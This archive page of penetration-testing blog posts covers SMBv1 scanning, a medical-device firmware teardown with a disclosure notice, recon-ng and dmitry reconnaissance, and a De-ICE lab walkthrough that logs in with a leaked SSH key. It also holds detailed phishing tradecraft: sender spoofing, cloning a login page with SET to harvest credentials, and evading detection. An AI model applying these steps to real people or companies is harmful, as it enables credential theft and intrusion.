pen test

All posts tagged pen test

Recently, I was asked to test all SMB enabled devices on a fairly large network to find any hosts that still supported SMBv1. This was about a month before Nmap released their SMB version enumeration NSE. I quickly threw together a script using Impacket from CoreImpact ( The initial script was about 10 lines including the imports, it was slow and only allowed for a single set of hardcoded input files. It was also single threaded so it was slow, about 4 seconds per address, it took almost a full day to complete for each iteration. Testing a patch program using this was untenable.

As we’re huge fans of code re-use I wrapped the script in my tried and true threading modules, re-learned argparse and created a function python program to only negotiate SMBv1 connections to a host. By only performing SMBv1 negotiation and not even including the options to enumerate others I didn’t duplicate the functionality from Nmap and don’t have to worry about false positives.

This script will generate a large amount of ARP requests during testing this is per RFC when connecting to port 139. If stealth is important reduce the threads using the -t option. Happy hunting and enjoy scanning for SMBv1.

We have added the repo to our GitHub requires netaddr, pycrypto and impacket
Install with:
 pip install pycrypto
 pip install impacket
 pip install netaddr
python [*options]
usage: smbv1 scanner [-h] [-i INPUT [INPUT ...] | -f FILE] [-t THREADS]
 [-o OUTPUT] [-v]

******* * * * * * * * Check SMB for Version 1 Support * * * * * * * *******

optional arguments:
 -h, --help show this help message and exit
 -i INPUT [INPUT ...], --input INPUT [INPUT ...]
 IP Address in CIDR Notation
 -f FILE, --file FILE file containing list of IPs to check
 -t THREADS, --threads THREADS
 Number of Threads
 -o OUTPUT, --output OUTPUT
 Output File Name
 -v, --version show program's version number and exit

******* * * * * * * * * * * * * * * * * * * * * * * * * *******

I recently had an appointment at an ophthalmologist and because it was in New Mexico, where appointments mean nothing and linear time isn’t a thing, I had a long wait in the exam room. Stay with me I swear we are going to pen test some stuff. Most of the equipment in the room was from Welch-Allyn so why not take a look at their stuff to see how secure my data would be.

I’m not an amazing reverse engineer; it is on my list of things to improve so I took this opportunity to dig into some firmware upgrades. I’ve looked through firmware in the past and decompiling binary files never got me any results.

I was able to find the firmware for the Welch-Allyn RETeval-DR, it isn’t sold in the United States but the file was available for download without authentication.

Welch Allyn RETeval-DR™ Firmware
Version 2.5.0 | November 11, 2015
System requirements: Windows XP, Windows 8 and all previous versions
File type: .fw | File size: 35.2 MB

I used the ‘file’ command to learn some things about the .fw file type.

root@kali:~/Desktop/RETeval-DR# file reteval-2.5.0.fw 
reteval-2.5.0.fw: Zip archive data, at least v2.0 to extract

Zip archive, I know what to do with those. At this point I assumed that this was going to be another binary fine and wasn’t super excited. Extracting the contents of the zip file reveals a bunch of .img files and an script.

.fw File Contents

.fw File Contents

My first thought was that the file might contain a login of some sort or some other sensitive data. The script contains some checksum validation and uses dd to write the images to disk. A very helpful piece of text is the offsets for each file are directly after the seek= .

dd offset values

dd offset values

I mounted the rootfs.img and poked around the file system.

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data# mount -t auto rootfs.img mnt/
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data# cd mnt
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt# ls
bin  boot  dev  etc  lib  lib32  linuxrc  lost+found  media  mnt  opt  proc  root  run  sbin  sys  tmp  usr  var

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cat passwd
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cd shadow
bash: cd: shadow: Not a directory

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0/data/mnt/etc# cat shadow

Pretty sure this means that the root password is blank…OPSEC 101. Almost 90% of penetration testings is asking yourself ‘What would happen if I did this?’ So, What would happen if I wrote that to a new disk on a virtual machine?

VMWare Blank Drive

VMWare Blank Drive


/dev/sdb added

/dev/sdb added

We will need to install pv for the installation to work, pv monitors progress of data and as data gets piped to it directly after it is unzipped and before it gets to the dd command in the install script. Also, we need to make the script executable before we try to use it.

root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# apt-get install pv
<Redacted the install text>
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# chmod +x 
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# ./ --help
  -a <archive name> (required)
  -b update boot loader too
  -d <destination> (required)
  -f fresh install (on PC)
  -n numeric progress
  -v print firmware version
  First time programming: -a firmware.fw -f -d /dev/sdc
  Firmware update: -a firmware.fw -d /dev/mmcblk0
root@kali:~/Desktop/RETeval-DR/reteval-2.5.0# ./ -a ../reteval-2.5.0.fw -n -f -d /dev/sdb
<Redacted the install text>
/dev/sdb after dd

/dev/sdb after dd

I used fdisk /dev/sdb to set the bootable flag on partition 1 (/dev/sdb1).

fdisk Set Bootable

fdisk Set Bootable

I couldn’t get it to boot independently in a VM and I couldn’t get sdb3 or sdb4 to mount in my Kali Linux box. I tried to use the -t auto and it failed, I also tried every Linux type that I could with no luck. Oh, well. In a few minutes we found the default password for the device and determined if we could boot the drives up in VM. Not bad for an eye appointment.

Disclosure Notice: We contacted Welch-Allyn on May 17, 2017 and notified them of the issue. As of June 30th they had not given me any feedback about mitigation status so I am releasing this. Forty five days is more than enough time to mitigate this vulnerability.


Let’s take inventory of the information we now have and decide where we will go from here.

Information Inventory

Figure 1 – Information Inventory

Using Modules

The three commands we used (show domains, show contacts, and show companies) will help us to decide which modules to use. The show modules command will display a list of modules to choose from.

show modules
show modules

Figure 2 – show modules

As a quick note for looking at the modules, the “-” delimiter divides the module into, “what you have and what you want”. So your command would look something like this: use I have recon/domains I want hosts/shodan_hostname

use recon/domains - hosts/shodan_hostname
recon-ng to shodan module

Figure 3 – recon-ng to shodan module

The red text indicates that an error occurred when running the module. The green text indicates the new elements added to the database.

shodan summary

Figure 4 – shodan summary

The module added hosts so using the show hosts command will show the additions.  Notice that we also have ports as well.

show hosts
show hosts results

Figure 5 – show hosts results

Notice this command displays the row id, the host, the ip address, and the module that was used.

show ports
show ports results

Figure 6 – show ports results

Remove Unwanted Entries

If we wanted to stay in the .com domain, we need a way to remove the .hk and other domains.

help delete
 help delete results

Figure 7 – help delete results

Remember show ports was the last command we ran so ports was the table we viewed. Running the show ports command again shows that the selected rows were removed ONLY for the ports table. To validate the command worked we will check the table again.

show ports
Cleaned ports table

Figure 8 – Cleaned ports table

The .hk domains are still present in the hosts table.  You will need to remove them from each table.

show hosts
show hosts results

Figure 9 – show hosts results

Exporting Data and Report Generation

Now that we’ve imported data from an outside source, ran several modules inside recon-ng, and we’ve even deleted data from the database, it’s time to create our report.  There are lots of options to choose from. The search reporting command gives us our choices.

search reporting
search reporting results

Figure 10 – search reporting results

The show dashboard command allows us to look at the modules used and the number of times they’ve been ran.  We can also see the amount of information inside the database.

show dashboard
show dashboard results

Figure 11 – show dashboard results

Some of the modules I ran were not in this tutorial.  From Figure 11 you can see all the modules used. Figure 12 is a continuation of the show dashboard command.  Here you can see the information that is captured in the database.  This also makes it easier for creating a report or exporting information.

show dashboard summary

Figure 12 – show dashboard summary

Exporting Data

We will use the reporting/list module to create a list of IP addresses to use in nmap.  This will tie in several things we’ve already covered.

  • Search for modules
  • Show options
  • Schema command
  • Set command

We will also use Nmap to scan for port 80.

search reporting
search reporting

Figure 13 – search reporting

use report/list
show options
report/list options

Figure 14 – report/list options

We will run the show schema and only show the truncated results so we can get the table schema.

show schema
show schema

Figure 15 – show schema

Next, use the set command to give recon-ng the file location.

set FILNAME /location/on/file/system
set file location

Figure 16 – set file location

Finally, run and let recon-ng generate the results. The screenshot is truncated so you can get an idea of what it looks like, your mileage may vary.

Report Results

Figure 17 – Report Results

<<Truncation Occurs>>>

Report Summary

Figure 18 – Report Summary

Using export_iplist.txt as input for our Nmap scan.

  • -iL input list filename
  • -p 80 port to scan
  • -Pn No Ping
nmap -iL export_iplist.txt -Pn -p 80
Nmap port 80 scan

Figure 19 – Nmap port 80 scan

Create Report

This section will show you how to create an HTML report using the same data set.

use reporting/html
show options
set CREATOR Pentester
set COMPANY United Airlines

Figure 20 – report/html

set options for report

Figure 21 – set options for report

We used the set command to add the creator and the customer properties for our report. Use the run command to execute the module.

generate report

Figure 22 – generate report

Not too exciting but we have our report waiting for us in the .recon-ng folder.

Report location

Figure 23 – Report location

Lets look at that file using a browser.

 File Browser

Figure 24 – File Browser

HTML Report Example

Figure 25 – HTML Report Example

The next set of figures will show the expanded results for the Summary, Domains, and Locations sections.

Summary Section

Figure 26 – Summary Section

Domains Section

Figure 27 – Domains Section

Locations Section

Figure 28 – Locations Section

The Contacts section we could have done a more with the information here.  One thing I like to do is us with this information is expand using the website. Using Pipl we could really dig into who any of the individuals are to create more effective spear phishing attacks or sales calls. Who are we kidding? We don’t do sales calls.

Contacts Section

Figure 29 – Contacts Section

Look through the Vulnerabilities section. We haven’t even started a technical vulnerability assessment and we already have a place to start. OSINT for the win!

Vulnerabilities Section

Figure 30 – Vulnerabilities Section

Vulnerabilities Section 2

Figure 31 – Vulnerabilities Section 2


In this tutorial we covered Recon-ng.  It can be found at  I really enjoy working with this tool.  Just playing with it can give you a better understanding of other ways to gather information about your target.  It really becomes about bread crumbs. How deep can you dig into a company, email address, or person?

Areas we covered:

  • Installation
  • Adding API Keys
  • Creating a Workspace
  • Importing information into the database “ Grep and Awk commands”
  • Using Modules
  • Removing unwanted entries
  • Exporting Data “ to use with nmap”
  • Creating Reports

This primer covers sending spoofed emails from an online service with a link to a clone credential harvesting site.  SET provides a clean, menu-driven interface for website cloning and automates the process. Using sendmail directly is also an option in SET; it requires a single change to the configuration and a mail relay to function correctly.

We will again use the Hackerone directory to identify a company but WILL NOT be sending phishing emails to them. This would be really bad form and potentially illegal. For this, we are going to pick on a known antivirus and security company, Kaspersky. Kaspersky was basically chosen because it is a large enough organization that we should be able to find a decent page to clone, and there should be enough email addresses in the wild to generate a list from a few different places.

Email Target List

The heart of any successful phishing campaign is the list of targets. Normally we would use recon-ng to build this list, but in this tutorial, we will do a few manual processes to show other methods. These can absolutely be automated, but for now lets do it the hard way.

From, I searched for “ -license”. This is because the top pastes were all license key dumps, and I was specifically looking for emails.

Pastebin Link 1 -
Pastebin Link 2 -

I threw the entire raw contents of the data in a text file, lets look in a few other places. We have already used theHarvester to find email addresses in the recon-ng tutorial, so let’s also use and put the results in the same text file.

root@kali:~/Desktop# theharvester -d -b all

We need to quickly pull out and de-duplicate the email addresses. This isn’t an issue with theHarvester but the pastebin data isn’t structured.

root@kali:~/Desktop# grep kasperskyRawEmails.txt > kasperskyEmail.txt
root@kali:~/Desktop# leafpad kasperskyEmail.txt
root@kali:~/Desktop# sort -d kasperskyEmail.txt > kasperskyEmailSorted.txt
root@kali:~/Desktop# sort -u kasperskyEmailSorted.txt > kasperskyEmail.txt

I used leafpad to clean up a few lines that had extra data. If there were more than a handful, I would have written a sed or awk script to clean it up, but with just a few, it was just as quick to do it manually. I sorted it with the -d option to put them in alphabetical order then -u to get rid of any duplicates. More importantly, by looking at the email addresses, we can easily guess anyone’s email in the company because they follow the A quick LinkedIn search of people who work at Kaspersky would provide us with another list. Personally, I would remove Eugene Kaspersky from the list since he is the founder, but hey, do what you want. In a normal penetration test, most companies would ask to approve the list and remove or add people as they see fit. For reporting reasons, running a wc -l against this list once approved will give you the number of emails. From these three searches, we have 142 unique targets.

While in the list, it is always good to look through and remove any email that is generic or does not direct to an actual person. Examples would be or Also and more importantly, remove anything that will get you caught. I hate to say this, but do not attempt to phish spam@ or abuse@ addresses; if it does work, you probably get extra h4x0r cred, though.

Baiting the Hook

To figure out who to spoof, I went on LinkedIn and searched for IT Support in the United States for Kaspersky. I’ve redacted the person’s name, but it is plausible that this person would send out an email about a website,  and since the email will be in English, that shouldn’t be a huge red flag. Sending out an email from an employee in the Russian Federation written in English should raise questions. Writing it in English and attempting to emulate a translation from Russian may work, as well.

Spoofed From Account

Spoofed From Account

Next, we need to identify a website to clone. We need a login on this page to spoof, so first we will use fierce to identify potential sub-domains.

root@kali:~/Desktop# fierce -dns

I looked through the fierce results and settled on for the page to be cloned. I like the simple page layout, so there are less chances for the clone to go wrong and log into a support page based on the title. VPN and Outlook Web Access (OWA) are normally my favorite pages, but occasionally, the clone needs to be massaged to make it look normal.

Next, let’s work on the Subject and Body of the email message.

Subject: Support Bot Login Page Test

All, We are testing the new login page for support bot at The old page had some certificate errors that prevented some users from reaching it so please let us know if this is still happening and also test that your password still works before the new systems goes live ( Let me know if you have any problems.


Spoofed IT Guy

Reading the email, we need to address a few things. First, is the certificate error that we get going to the real site? This is one of the many reasons why it is important to NOT train your users to click through certificate errors. Also, mixing a little bit of truth in with the lie helps to make it more effective.

Certificate Error

Certificate Error

Second, ask them to log into the page and contact us if there are any errors. Because we will be using a spoofed email and not a fake email address, this adds a little bit of risk that someone will respond and either confuse the IT staff or alert them to the phishing campaign that is underway. Spend some time thinking and crafting the email message to work for the company you’re testing.

We will use SET to clone the website and harvest credentials. The ***** indicates that I’ve redacted the screen text and have only shown the option to choose.

root@kali:/opt/social-engineer-toolkit# setoolkit
 Select from the menu:

1) Social-Engineering Attacks
 2) Penetration Testing (Fast-Track)
 3) Third Party Modules
 4) Update the Social-Engineer Toolkit
 5) Update SET configuration
 6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1
 Select from the menu:

1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) Wireless Access Point Attack Vector
 8) QRCode Generator Attack Vector
 9) Powershell Attack Vectors
 10) SMS Spoofing Attack Vector
 11) Third Party Modules

99) Return back to the main menu.
 set> 2
 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Web Jacking Attack Method
 6) Multi-Attack Web Method
 7) Full Screen Attack Method
 8) HTA Attack Method

99) Return to Main Menu

 1) Web Templates
 2) Site Cloner
 3) Custom Import

99) Return to Webattack Menu


[-] Credential harvester will allow you to utilize the clone capabilities within SET
 [-] to harvest credentials or parameters from a website as well as place them into a report
 [-] This option is used for what IP the server will POST to.
 [-] If you're using an external IP, use your external IP for this
 set:webattack> IP address for the POST back in Harvester/Tabnabbing: 

The address is either for the local host (in this case) or for the server that will be hosting the web servers external interface. (NOTE: We are currently watching this thread, if a fix gets posted for the OpenSSL/PEM file issue we will update this)

[-] SET supports both HTTP and HTTPS
 [-] Example:
 set:webattack> Enter the url to clone:

[*] Cloning the website:
 [*] This could take a little bit...
 Python OpenSSL wasn't detected or PEM file not found, note that SSL compatibility will be affected.
Cloned Site

Cloned Site

Real Site

Real Site

If you wanted to add SSL support to improve the quality of the attack, SET absolutely supports it with a few changes. And will allow you to get free SSL certificates. I’ve highlighted the differences in the preceding images.

[*] Printing error: zipimporter() argument 1 must be string, not function

The best way to use this attack is if username and password form
 fields are available. Regardless, this captures all POSTs on a website.
 [*] The Social-Engineer Toolkit Credential Harvester Attack
 [*] Credential Harvester is running on port 80
 [*] Information will be displayed to you as it arrives below: - - [27/Apr/2017 16:11:47] "GET / HTTP/1.1" 200 -

Now, we send out bait and see who we can catch.

 Set the Hook

We have used a couple different email spoofing services and have recently settled on They work well, and they don’t get blacklisted in mail servers. It is a paid server; though, if you want premium features such as removing the tag line at the bottom or sending SMS messages. Below is a screen showing how to send messages in Sharpmail; there is an argument to be made that putting a few of the addresses together in the To: line would make it more believable, but for now, they are all in the BCC: line.

Sharpmail Example

Sharpmail Example

Finally, we would send this email out and simply wait to see who got hooked.

SET has a nice live update when credentials are captured and also packages up a report at the end.

Live Output

Live Output

HTML Report

HTML Report

From here it would depend on what the client requests. Do you use these credentials to attempt further exploitation or just produce the report? Your testing might be done, or you could have potentially generated a bunch of additional work for yourself.


I’ve conducted phishing campaigns at many different companies. Overall, I probably have a 10% success rate. Some were a little higher and some a little lower. That doesn’t sound too impressive, right? How many successes does it take to compromise a network? One. One user clicking on a link in an email exposes the entire network. So, for most companies, I got significantly more than that one success. How did I do it? More importantly, what tricks do I have up my sleeve that other penetration testers could steal? At almost every conference you will see a talk on some super sweet post-exploitation tool or privilege escalation technique if you can talk to the speaker 9 times out of 10 they gained initial network access through phishing. Phishing is the dirty pen testing secret that we all do but nobody wants to talk about because it isn’t nearly as cool as remote code execution.

Finding Targets

Generally, there are two methods for generating lists for phishing campaigns: either the client will provide you a list (which is boring) or you can find valid targets and get the list approved. Where can you find valid targets? I consider a valid target any email address already exposed on the internet.

  • Recon-ng
  • Linkedin
  • Pastebin
  • Google
  • FOCA
  • Web content

In the future, we will look at each of these methods in depth, but for now, let’s just assume you have a list.

Sending Emails

The FROM line in the address is just as important as the TO. Are you sending a fairly generic phishing email hoping to get a few clicks? If so, your success rate is going to be fairly low. For a company without security awareness training in place, this might be appropriate, but most tests are meant to be more sophisticated. I am going to show you how I make the sausage; fair warning, it isn’t pretty.

If you are going for a generic attempt without a spoofed email address, you can try to get an email address from any of the normal providers like Gmail or Outlook. Registering an email that looks at least semi-plausible will help. Outlook has a built-in limitation for new accounts to restrict the number of emails sent until the account ages or milestones are met (such as phone number verification). Also, filling in the display name and information to seem legitimate will increase the chance of success. CompanyHelpDesk@gmail is better than PhishingAttempt6@yahoo.

If you are allowed to spoof email addresses, a few better options are available. Setting up sendmail and sending everything through Social-Engineering Toolkit (SET) is a great option. Using a webmail service that allows spoofed emails is also a great option and protects your fixed IP from being banned for email abuse. It is also smart to pay the small fee that allows the footer to be removed. If you are performing a penetration test, it is the cost of doing business. I personally like using Sharpmail out of the UK but have used a couple other servers, as well. Sharpmail has SMS functionality, which I have used on assessments in the past.

Everyone has seen poorly crafted phishing emails signed Help Desk, so you need to step up your game and do some research. Find the company on Linkedin, and figure out who the IT person is. Getting an email from a help desk address signed Gary when employees know there is an IT person named Gary is way more convincing. The correct tone is important too, as a busy help desk person sending a curt email stating, ‘We are testing a new web server for email, can you log in and test it? -Gary‘ is more believable than a two-paragraph, formal-sounding email. I rarely even hide my URL behind a link for the same reason; I wouldn’t do that as a systems administrator in a company and want them to be believable.

Some clients will also want you to get the email text and targets approved. I’ve had to add typos and dumb down my emails for clients who wanted to make it easier to be spotted. Those assessments are the best because you can almost guarantee success if even their employers think they are going to click on anything. Most of these assessments will come shortly after the company has been breached by a phishing attack.

Microsoft Outlook Web Access or a VPN login page are my two favorite sites to clone in SET. We will conduct a primer on SET soon, but for now, just know that I use the clone website function with the capture credentials module. I’ve used Browser Exploitation Framework (BeEF) in the past, but keeping it simple usually works better.

Now What?

The first time I was assigned a phishing campaign, I had no idea what to do. I fired up SET but didn’t have sendmail installed and configured. The client for that assessment wanted multiple tests done. Not only was it testing employee awareness, it was testing the email security appliance in place. Sendmail took me most of the day to get set up and start sending emails. Let’s just say that it did not go well; the appliance blocked all my spoofing attempts and having an included URL hidden behind link text tripped the heuristics, with the end result being the end users didn’t even get the attempts. Not only that, but because I worked from home, the IP I paid for from my ISP got blacklisted for sending spam.

What lessons did I learn? One, I rarely use my own sendmail account anymore. Two, I’ve gotten simpler in my messages. Three, I respond to replies. What? That’s right, when your login fails on the credential harvesting site I’ve created and you reply to the email complaining, I’ll tell you I’m working on it and that I will let you know when it’s fixed. Why? So that you don’t tell other people you’re having a problem and potentially prevent them from giving me their credentials. Sneaky right?

Reporting on phishing is simple; we normally produce a statistics-based report that shows how many credentials were gathered versus the number of emails sent. We avoid giving specific names, which clients always want, because it is normally a systemic issue, not a user issue. We have performed custom redirects, after credential harvesting, to a site that forces users to complete a short training on phishing awareness.

Pulling it All Together

Now that you have read this tradecraft on phishing, you may be asking, “what are the next steps?” Next, we are going to create some primers on setting up phishing campaigns using sendmail and Sharpmail and using SET to clone a website and harvest credentials. This simply gave you a glimpse into the mindset of how we think about attacks and some of the pitfalls encountered.

For quite some time fierce was my go to DNS testing tool, we even wrote a post on it, and I still use it extensively but recently I have been using dmitry in parallel. dmitry is the Deepmagic Information Gathering Tool and while it doesn’t have the subdomain brute force functionality that I love in fierce it automates other functions that I never realized I was tired of doing manually.

Why do we spend so much time on DNS? A companies DNS server is a gold mine of information during a penetration test. This is especially true if organizations that have an improperly configured split view DNS where internal records are exposed externally. It is also pretty common to find test, development, or integration servers that have been exposed in DNS and then forgotten about. Why spend all of your penetration testing efforts on the fully patched and hardened server when the test server from 2006 is available. DNS helps find the path of least resistance. Once again we will be using the hackerone directory to demonstrate this tool on real world systems. For dmitry I chose

root@kali:~# dmitry -h
Deepmagic Information Gathering Tool
"There be some deep magic going on"

dmitry: invalid option -- 'h'
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
  -o     Save output to %host.txt or to file specified by -o file
  -i     Perform a whois lookup on the IP address of a host
  -w     Perform a whois lookup on the domain name of a host
  -n     Retrieve information on a host
  -s     Perform a search for possible subdomains
  -e     Perform a search for possible email addresses
  -p     Perform a TCP port scan on a host
* -f     Perform a TCP port scan on a host showing output reporting filtered ports
* -b     Read in the banner received from the scanned port
* -t 0-9 Set the TTL in seconds when scanning a TCP port ( Default 2 )
*Requires the -p flagged to be passed

We are going to simply step through the options with a brief description and talk about what information would be useful during different phases of a pen test.

-i and -w perform a whois lookup in a slightly different way. We will combine them together to get an IP address and a whois lookup at the same time. For our primer the domain name would probably be the preferred start point but if you only had an IP address to start with the -i option would get the same results. I’ve used dmitry to track down the source of a brute force attack on an internet facing system. It wasn’t very amazing it was a compromised host in a medium size company.

Whois Lookup

Figure 1 – Whois Lookup

I’ve redacted the screenshot since whois reports are fairly extensive. But we know that the IP address we are working on is and it is part of the subnet. We also know that it is part of RIPE the regional internet registry that includes Europe. Which makes since because they are out of the Netherlands.

Next we will get the information for the domain. Netcraft is an internet security firm out of the UK which does anti-spam and anti-phishing work. We learn two things from the -n option. First, they are reputable enough to not have been reported for spam/phishing and second, that the IP address for the system changed so they probably have a load balancer or are hosting from multiple locations. This also makes sense.

Netcraft Report

Figure 2 – Netcraft Report

Lets use the -s option to look for subdomains. This isn’t super interesting but at least it has a few that we could look at if we were testing the entire domain.

Subdomain Search

Figure 3 – Subdomain Search

The -e option is useful for starting phishing attacks or feeding information into recon-ng, which we also have a tutorial on (hint, hint). This specific test was super anti-climatic but you get the idea.

Email Search

Figure 4 – Email Search

dmitry also has a built in port scanner, I like the banner enumeration function so I normally stack the -b option onto the -p port scan option.

Port Scan

Figure 5 – Port Scan

Wow, that is a lot of step. Why wouldn’t you just stack all those into one and write it out to a file instead? Because then how would this whole primer be longer than one page? The last screenshot is how I actually use it and I read out of the file instead of off the screen.

Combined Testing

Figure 6 – Combined Testing was a boring choice for this tool but with luck whatever domain you point it at will be fruitful.

I had never done the S2 LiveCD; honestly I didn’t know it existed until I was looking for the download links for the series 1 set. This is basically a clean up to date walkthrough using Kali. All of the spoilers are in the walkthrough as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

SE-ICE S2.100

Download Link:

Scenario: The scenario for this LiveCD is that you have been given an assignment to test a company’s network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency previous (or current) staff.

Default IP:

1. Port scan host and create list of open ports
2. Obtain access to file system
3. Perform post exploitation
4. Rummage about in the file system
4. FINAL FLAG: Find salary and Social Security Information for employees

Spoilers and Walkthrough

Using netdiscover to find the potential addresses I found the .100 and .101 addresses active.

root@kali:~# netdiscover

 Currently scanning:   |   Screen View: Unique Hosts            
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300               
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------     00:50:56:c0:00:08      1      60  Unknown vendor           00:50:56:f0:ee:65      1      60  Unknown vendor         00:0c:29:1f:c6:f0      1      60  Unknown vendor         00:0c:29:1f:c6:f0      1      60  Unknown vendor         00:50:56:fe:3a:17      1      60  Unknown vendor

I’ll start by creating a metasploit workspace and doing a port scan of the host. The name for the workspace is terrible but since I didn’t know that I would be differentiating between series 1 and 2 but it works.

workspace -a de-ice2-100
workspace de-ice2-100
db_nmap -T5 -p 0-65535 -A

I have had great success in numerous penetration tests with data in FTP so I will start there. Personally I like to use the filezilla GUI, I know that goes against everything that makes pen testing fun so feel free to use the command line. The anonymous user doesn’t perform a directory listing or show any files so lets dig into the vsftpd service. Searchsploit is the local version of the exploit-db database with the added benefit of not having to click on the CAPTCHA box.

root@kali:~# searchsploit vsftp
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/
vsftpd 2.3.2 - Denial of Service             | linux/dos/16270.c
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/
vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
--------------------------------------------- ----------------------------------

Nothing specific for that version and mostly denial-of-service attacks so for now we can move on. Lets see what mischief we can get into with the web site. From the website directory we can harvest a list of users and email addresses for use later. In a real-world penetration test this would be the start for a well orchestrated phishing campaign.


The .101 website looks like a generic policy site so lets dig deeper into bother of them. Nikto finds some generic problems with the server but nothing that is immediately exploitable.

nikto -h
nikto -h
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.

Lets rummage around in that directory. Nada.

During the Nmap scan we found out that the SMTP server has the VRFY verb enabled allowing us to determine potential user accounts for a brute force attack. The list is fairly simple, last name only, first name only, and first initial last name.


Metasploit has an SMTP enumeration module that we will use.

msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/s2100users.txt
USER_FILE => /root/Desktop/s2100users.txt
msf auxiliary(smtp_enum) > set RHOSTS
msf auxiliary(smtp_enum) > run

[*]      - Banner: 220 ESMTP Sendmail 8.13.7/8.13.7; Wed, 19 Apr 2017 12:00:02 GMT
[+]      - Users found: Havisham, Magwitch, Pirrip
[*] Scanned 1 of 1 hosts (100% complete)

We now have three verified usernames to start an attack (Havisham, Magwitch, Pirrip). The .101 address had a ~root directory that was readable so lets check for those user directories. Good news, there aren’t any files in these either but all three exist. What files do we expect to see in a users home folder? I made a dump of my home folder to answer this question and some of the items that are obviously penetration testing tools. Linux hides folders that start with a . so lets dump this into a wordlist and get started.

root@kali:~# ls -a
.              core       .ICEauthority  .nano              Templates
..             Desktop    .install4j     .oracle_jre_usage  Videos
.bash_history  Documents  .java          Pictures           .w3af
.bashrc        Downloads  .john          .profile           .wget-hsts
.bundle        .faraday   .local         Public
.BurpSuite     .gconf     .mozilla       .rnd
.cache         .gnupg     .msf4          .sqlmap
.config        .halberd   Music          .ssh
Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                Required  Description
   ----        ---------------                --------  -----------
   DICTIONARY  /root/Desktop/webwordlist.txt  no        Path of word dictionary to use
   PATH        /~root                         yes       The path  to identify files
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                  yes       The target address range or CIDR identifier
   RPORT       80                             yes       The target port (TCP)
   SSL         false                          no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                            yes       The number of concurrent threads
   VHOST                                      no        HTTP server virtual host

msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~magwitch
PATH => /~magwitch
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~havisham
PATH => /~havisham
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~pirrip
PATH => /~pirrip
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for
[*] Found 404 (
[*] Found 200 (
[*] Found 404 (
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The bold line above doesn’t show up in the other three but it has a 404 error which is odd also the /./ is a 200 code instead of a 404. Lets take a closer look.

.SSH Folder

Figure 1 – .SSH Folder

That sure looks like it exists. Lets take a quick detour into SSH to explain why this is important. SSH allows for password based authentication like we saw in the De-ICE series 1 LiveCDs it also can use Public Key encryption which relies on a generated public/private key pair. Having the id_rsa file is almost as good as having a the password in cleartext. Copy those two files to your .ssh local folder. Linux gets really upset if you don’t have 600 permissions set on id_rsa files so this saves a step of getting the error message, looking up the fix, and trying again.

root@kali:~/Desktop# ssh -i id_rsa pirrip@
The authenticity of host ' (' can't be established.
RSA key fingerprint is SHA256:Z26/6SkV1lodQR++6+78wD4acFpG2KigCTuwo04+Xlw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (RSA) to the list of known hosts.
Linux 2.6.16.
pirrip@slax:~$ id
uid=1000(pirrip) gid=10(wheel) groups=10(wheel)
pirrip@slax:~$ su -
Password: ****

We don’t know the password so even being a member of the wheel group doesn’t help much. There isn’t much to work with in the file system either. In a normal penetration test you could use this system to pivot into others or upload a netcat or meterpreter shell. In this case since this is the only system in scope let look at other potential data sources. We know this is a mail server so:

pirrip@slax:~$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N  1 Abel Magwitch      Sun Jan 13 23:53   20/748   Estella
 N  2 Estella Havisham   Sun Jan 13 23:53   20/780   welcome to the team
 N  3 Abel Magwitch      Sun Jan 13 23:53   20/875   havisham
 N  4 Estella Havisham   Mon Jan 14 00:05   20/861   next month
 N  5 Abel Magwitch      Mon Jan 14 00:05   20/868   vacation
